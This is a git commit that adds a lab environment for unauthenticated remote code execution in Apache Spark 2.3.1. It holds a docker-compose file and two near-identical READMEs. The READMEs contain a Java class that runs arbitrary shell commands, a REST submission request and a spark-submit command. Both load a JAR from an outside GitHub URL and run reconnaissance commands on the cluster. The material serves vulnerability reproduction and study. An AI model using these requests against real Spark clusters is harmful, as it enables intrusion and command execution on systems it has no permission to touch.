first commit
BIN
spark/unacc/1.png
Normal file
Binary file not shown. Size: 50 KiB
BIN
spark/unacc/2.png
Normal file
Binary file not shown. Size: 174 KiB
131
spark/unacc/README.md
Normal file
@@ -0,0 +1,131 @@
# Apache Spark Unauthorized Access Leads to Remote Code Execution

[中文版本(Chinese version)](README.zh-cn.md)

Apache Spark is a cluster computing system that allows users to submit applications to the management node, which distributes them to the cluster for execution. If the management node has not enabled an ACL (Access Control List), anyone can submit an application and execute arbitrary code in the cluster.

Reference links:

- https://weibo.com/ttarticle/p/show?id=2309404187794313453016
- https://xz.aliyun.com/t/2490

## Vulnerability Environment

Execute the following command to start an Apache Spark cluster in standalone mode, consisting of one master and one slave:

```
docker compose up -d
```

After the environment starts, visit `http://your-ip:8080` to access the master's management page, and `http://your-ip:8081` to access the slave's management page.
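
As a quick sanity check from the command line (a sketch; `your-ip` stands in for the host running the environment), both pages should return HTTP 200:

```
curl -s -o /dev/null -w "%{http_code}\n" http://your-ip:8080   # master management page
curl -s -o /dev/null -w "%{http_code}\n" http://your-ip:8081   # slave management page
```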

## Vulnerability Reproduce

The essence of this vulnerability is that an unauthorized user can submit an application to the management node, and that application can carry malicious code.

There are two ways to submit an application:

1. Using the REST API
2. Using the submissions gateway (integrated into port 7077)

The application can be written in Java or Python. Here is a simple example class (from reference link 1):

```java
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class Exploit {
    public static void main(String[] args) throws Exception {
        String[] cmds = args[0].split(",");

        for (String cmd : cmds) {
            System.out.println(cmd);
            System.out.println(executeCommand(cmd.trim()));
            System.out.println("==============================================");
        }
    }

    // https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
    private static String executeCommand(String command) {
        StringBuilder output = new StringBuilder();

        try {
            Process p = Runtime.getRuntime().exec(command);
            p.waitFor();
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));

            String line;
            while ((line = reader.readLine()) != null) {
                output.append(line).append("\n");
            }
        } catch (Exception e) {
            e.printStackTrace();
        }

        return output.toString();
    }
}
```

Compile it into a JAR file and host it on any HTTP or FTP server, for example: `https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar`.
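
For reference, one way to produce such a JAR is sketched below (assuming a JDK is on the PATH; the class and file names follow the example above):

```
javac Exploit.java               # compile the example class
jar cf Exploit.jar Exploit.class # package it; no manifest main class is needed,
                                 # since mainClass is supplied at submission time
```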

### Submitting an Application via the REST API

In standalone mode, the master starts an HTTP server on port 6066. We can submit a REST-formatted API request to this port:

```
POST /v1/submissions/create HTTP/1.1
Host: your-ip:6066
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/json
Connection: close
Content-Length: 680

{
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.3.1",
    "appArgs": [
        "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
    ],
    "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
    "environmentVariables": {
        "SPARK_ENV_LOADED": "1"
    },
    "mainClass": "Exploit",
    "sparkProperties": {
        "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
        "spark.driver.supervise": "false",
        "spark.app.name": "Exploit",
        "spark.eventLog.enabled": "true",
        "spark.submit.deployMode": "cluster",
        "spark.master": "spark://your-ip:6066"
    }
}
```

Here, `spark.jars` is the compiled application, `mainClass` is the class to run, and `appArgs` holds the arguments passed to the application.
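
The same request can also be sent with curl, as in the following sketch (`your-ip` is a placeholder, and `appArgs` is shortened to two commands for brevity):

```
curl -X POST http://your-ip:6066/v1/submissions/create \
  -H "Content-Type: application/json" \
  -d '{
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.3.1",
    "appArgs": ["whoami,id"],
    "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
    "environmentVariables": {"SPARK_ENV_LOADED": "1"},
    "mainClass": "Exploit",
    "sparkProperties": {
      "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
      "spark.driver.supervise": "false",
      "spark.app.name": "Exploit",
      "spark.eventLog.enabled": "true",
      "spark.submit.deployMode": "cluster",
      "spark.master": "spark://your-ip:6066"
    }
  }'
```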

![](1.png)

The response will contain a `submissionId`. You can then view the execution results by visiting `http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout`:

![](2.png)

Note: while the application is submitted to the master, the results are viewed on the slave that actually executes it (default port 8081). In real-world scenarios, there may be multiple slaves.
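
The stdout log can also be fetched directly (a sketch; `driver-20180710023818-0000` is a hypothetical submissionId, and the port belongs to whichever slave ran the driver):

```
curl "http://your-ip:8081/logPage/?driverId=driver-20180710023818-0000&logType=stdout"
```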

### Using the Submissions Gateway

If port 6066 is inaccessible or protected by access controls, we can use the master's main port, 7077, to submit applications.

This can be done using Apache Spark's bundled script `bin/spark-submit`:

```
bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id
```

If the master you specify is a REST server, this script will first try to submit the application via the REST API; if it is not a REST server, it falls back to the submissions gateway.

The results can be viewed in the same way as described above.
129
spark/unacc/README.zh-cn.md
Normal file
@@ -0,0 +1,129 @@
# Apache Spark Unauthorized Access Leads to Remote Code Execution

Apache Spark is a cluster computing system that supports submitting applications to the management node, which distributes them to the cluster for execution. If the management node has not enabled an ACL (access control), we can execute arbitrary code in the cluster.

Reference links:

- https://weibo.com/ttarticle/p/show?id=2309404187794313453016
- https://xz.aliyun.com/t/2490

## Vulnerability Environment

Execute the following command to start an Apache Spark cluster in standalone mode, containing one master and one slave:

```
docker compose up -d
```

After the environment starts, visit `http://your-ip:8080` to see the master's management page, and `http://your-ip:8081` to see the slave's management page.

## Vulnerability Exploitation

The essence of this vulnerability is that an unauthorized user can submit an application to the management node, and that application can carry malicious code.

There are two ways to submit an application:

1. Using the REST API
2. Using the submissions gateway (integrated into port 7077)

The application can be written in Java or Python; a minimal class is enough, for example (from reference link 1):

```java
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class Exploit {
    public static void main(String[] args) throws Exception {
        String[] cmds = args[0].split(",");

        for (String cmd : cmds) {
            System.out.println(cmd);
            System.out.println(executeCommand(cmd.trim()));
            System.out.println("==============================================");
        }
    }

    // https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
    private static String executeCommand(String command) {
        StringBuilder output = new StringBuilder();

        try {
            Process p = Runtime.getRuntime().exec(command);
            p.waitFor();
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));

            String line;
            while ((line = reader.readLine()) != null) {
                output.append(line).append("\n");
            }
        } catch (Exception e) {
            e.printStackTrace();
        }

        return output.toString();
    }
}
```

Compile it into a JAR and host it on any HTTP or FTP server, for example `https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar`.

### Submitting an Application via the REST API

In standalone mode, the master starts an HTTP server on port 6066; we submit a REST-formatted API request to this port:

```
POST /v1/submissions/create HTTP/1.1
Host: your-ip:6066
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/json
Connection: close
Content-Length: 680

{
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.3.1",
    "appArgs": [
        "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
    ],
    "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
    "environmentVariables": {
        "SPARK_ENV_LOADED": "1"
    },
    "mainClass": "Exploit",
    "sparkProperties": {
        "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
        "spark.driver.supervise": "false",
        "spark.app.name": "Exploit",
        "spark.eventLog.enabled": "true",
        "spark.submit.deployMode": "cluster",
        "spark.master": "spark://your-ip:6066"
    }
}
```

Here, `spark.jars` is the compiled application, `mainClass` is the class to run, and `appArgs` holds the arguments passed to the application.

![](1.png)

The response contains a `submissionId`. Then visit `http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout` to view the execution results:

![](2.png)

Note that the application is submitted on the master, while the results are viewed on the slave that actually executes it (default port 8081). In real-world scenarios, there may be multiple slaves.

### Using the Submissions Gateway

If port 6066 is not accessible or is protected by access controls, we can use the master's main port, 7077, to submit applications.

The method is to use Apache Spark's bundled script `bin/spark-submit`:

```
bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id
```

If the master you specify is a REST server, this script will first try to submit the application using the REST API; if it finds the target is not a REST server, it falls back to the submissions gateway.

The results can be viewed in the same way as before.
14
spark/unacc/docker-compose.yml
Normal file
@@ -0,0 +1,14 @@
services:
  master:
    image: vulhub/spark:2.3.1
    ports:
      - "8080:8080"
      - "7077:7077"
      - "6066:6066"
  slave:
    command: "slave spark://master:7077"
    image: vulhub/spark:2.3.1
    depends_on:
      - master
    ports:
      - "8081:8081"